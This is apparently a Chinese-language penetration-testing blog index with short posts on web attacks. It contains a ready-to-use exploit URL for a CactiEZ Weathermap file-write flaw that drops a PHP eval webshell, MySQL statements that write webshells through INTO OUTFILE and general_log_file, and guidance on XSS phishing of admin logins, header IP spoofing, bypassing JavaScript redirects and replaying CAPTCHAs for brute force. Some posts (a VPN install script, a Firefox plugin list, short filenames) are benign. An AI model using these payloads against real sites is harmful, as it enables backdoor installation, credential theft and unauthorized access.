Note's blog


  • 首页

  • 分类

  • 关于

  • 归档

  • 标签

  • 公益404

  • 搜索

CactiEZ weathermap插件任意文件写入

发表于 2018-04-09 | 分类于 Web安全

code如下:

1
http://www.xxx.cn/cacti//plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=<?php echo(md5(1));@eval($_POST[0]);?>&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name

生成文件:

1
http://www.xxx.cn/cacti/plugins/weathermap/configs/test.php

文件名以及密码可以在code中设定。

测试时发现,“weathermap”目录名被改为了“weathermap.”。

原贴地址:
http://bobao.360.cn/snapshot/index?id=164538

L2TP/IPSec一键安装脚本

发表于 2018-04-09 | 分类于 Web安全

脚本适用环境:
系统支持:CentOS6+,Debian7+,Ubuntu12+
内存要求:≥128M

使用方法:
root用户登录后,运行以下命令:

1
2
3
wget --no-check-certificate https://raw.githubusercontent.com/teddysun/across/master/l2tp.sh
chmod +x l2tp.sh
./l2tp.sh

阅读全文 »

火狐浏览器常用插件

发表于 2018-02-24 | 分类于 Web安全

火狐浏览器各版本的下载地址,来自火狐官方服务器:http://ftp.mozilla.org/pub/mozilla.org//firefox/releases/

常用的插件更新速度较慢,更不上火狐浏览器的更新速度,导致很多插件在最新版本的浏览器上无法使用,这里我使用的是:Firefox Setup 50.1.0.exe,下载地址如下:
http://ftp.mozilla.org/pub/firefox/releases/50.1.0/win64/zh-CN/Firefox Setup 50.1.0.exe

常用插件

Hackbar

提供SQL注入和XSS攻击,能够快速对字符串进行各种编码。

Firebug

修改cookie等。

Live Http Headers

重放request数据包。

User Agent Switcher

修改客户端USER Agent的插件。

Wappalyzer

查看网站使用的应用程序。

FlagFox

可以在地址栏或状态栏上显示出当前网站所在国家的国旗,也有更多的其他功能,如:双击国旗可以实现WOT功能,鼠标中键点击是WHOIS功能。当然用户可以在选项里设置快捷键实现诸如复制IP,维基百科查询等功能。

MySQL root账号general_log_file方法获取webshell

发表于 2018-02-06 | 分类于 Web安全

通过general_log和general_log_file来获取webshell

网站开放了phpmyadmin,知道网站真是路径和root账号密码的情况下,最简单的getshell的方法就是直接导出webshell:

1
select '<?php @eval($_POST["lzx"]);?>' into outfile 'C:/phpStudy/WWW/1.php';

但是今天在测试的时候发现报错了:

1
The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

意思是MySQL开启了–secure-file-priv选项,禁止执行这条语句。

MySQL打开general_log之后,所有的查询语句都可以在general_log文件中以可读的方式得到,但是这样general_log文件会非常大,所以默认都是关闭的。有的时候为了查错等原因,还是需要暂时打开general_log的。换句话说general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。在mysql中执行查询:

1
2
3
SET global general_log='on';
SET global general_log_file='D:/phpStudy/WWW/cmd.php';
SELECT '<?php assert($_POST["cmd"]);?>';

然后访问http://www.xxx.com/cmd.php文件即可。

IIS7.5解析php解析漏洞shell权限过低的解决办法

发表于 2018-01-30 | 分类于 Web安全

今天在进行测试的时候,遇到一个IIS7.5的服务器,解析php脚本文件是存在解析漏洞,上传图片木马之后,配合解析漏洞getshell,发现只对上传的目录有读写权限,其他目录全部无法访问,解决的办法是上传asp或者aspx的脚本目录,能够获取到更高的权限。

在cmd中执行命令路径中包含空格的解决办法

发表于 2018-01-22 | 分类于 Web安全

今天找到一个站存在Struts-045漏洞,但是使用工具在执行命令的时候,由于命令中存在空格,执行时会报错:

出错的原因就是因为路径中存在空格。

解决方案

将整个路径和程序使用双引号包起来:

短文件名法:

比如c:\Program Files缩写为c:\Progra~1。

1
2
3
采用8个字符缩写,即写头六个字母(略去空白),另加波浪号和1,首字母不足六个字母,略去空白,用了第二个词的字母,凑成六个。例如:
"Documents and Settings" -- DOCUME~1
"Local Settings" -- LOCALS~1 (注意略去空白,用了第二个词的字母,凑成六个,再加波浪号和1)

如果多个文件前6字符一样怎么办?为什么最后是1而不是0或者其他数字呢?看看这个例子:
假设下面是你的C盘根目录中的文件夹:

1
2
3
Program Files
Progra file
Progra zhang

则三个目录分别表示为:C:\Progra~1; C:\Progra~2; C:\Progra~3;

XSS钓鱼获取后台账号密码

发表于 2018-01-07 | 分类于 Web安全

前几天在测试某个网站的时候,发现存在存储型跨站脚本漏洞,但是cookie被设置了http-only属性,导致无法获取到cookie的内容,有用的信息只是能够知道后台的地址,重要的cookie被保护起来了,获得的信息并没有Sessionid,也没有授权key,更没有账号和密码,于是把思路转向钓鱼,访问后台,查看源代码。

使用钓鱼的方式获取网站后台账号密码

伪造后台登录界面

查看后台源代码,在本地保存为html文件,并且整理网站链接的路径,将原来的相对路径补充为完整的绝对路径(注意,网站的绝对路径需要是目标网站的域名):

这样,我们就在本地伪造了一个一模一样的后台登录界面。

阅读全文 »

伪造IP的几种方式

发表于 2017-12-14 | 分类于 Web安全

X-Client-IP: 1.1.1.1
X-Remote-IP: 2.2.2.2
X-Remote-Addr: 3.3.3.3
X-Originating-IP: 4.4.4.4
X-Forwarded-For: 5.5.5.5
client-ip: 6.6.6.6

利用BurpSuite突破JS限制登陆后台

发表于 2017-12-14 | 分类于 Web安全

使用Burpsuite突破js跳转

今天在测试网站的时候,发现某个网站的后台登录页面,再输入错误的账号密码之后,首先会进入后台,然后程序验证密码错误之后,再使用js将页面重定向到后台的登录页面,如果我们禁用了这个跳转的js,那么就可以直接进入后台了。当然突破js的方法比较多,比如以前使用firefox浏览器就有禁用js的功能,但是禁用js以后,后台的很多功能是无法使用的,这就需要我们找一个工具来实现禁用一小部分js代码的功能,比如去掉跳转的js,今天使用burp来禁止。

1.使用burp抓取到post错误账号密码之后的返回包,找到html body中的js重定向语句。
2.修改proxy->options里面的match and replace,将js语句替换为空即可。

图片验证码安全问题

发表于 2017-11-12 | 分类于 Web安全

验证码未设置为POST一次就失效

测试的时候发现,有些web应用,未设置验证码验证一次就失效,导致攻击者能够通过抓包重放的方式,暴力破解,验证码形态虚设(用户登录失败,放回到登录页面的时候会重新请求一次验证码,只要不重新请求验证码,上一次的验证码就一直有效)。

验证成功一次之后,以后不再验证

有些应用,在验证用户的验证码正确一次之后,就不再验证了,攻击者通过抓包,第一次验证成功之后,下次开始进行暴力破解的时候,数据包中的验证码设置为空就可以了。

12…10
Note

Note

布施、持戒、忍辱、精进、禅定、般若

100 日志
6 分类
33 标签
GitHub Twitter 微博 豆瓣 知乎
Links
  • FreeBuf
  • i春秋
  • amoBBS
  • CodeSec
  • 补天
  • klion
  • 看雪论坛
  • 漏洞盒子
  • 91ri
  • Akkuman
  • fatofyoung
  • waitalone
  • seay
© 2018 Note
由 Hexo 强力驱动
主题 - NexT.Mist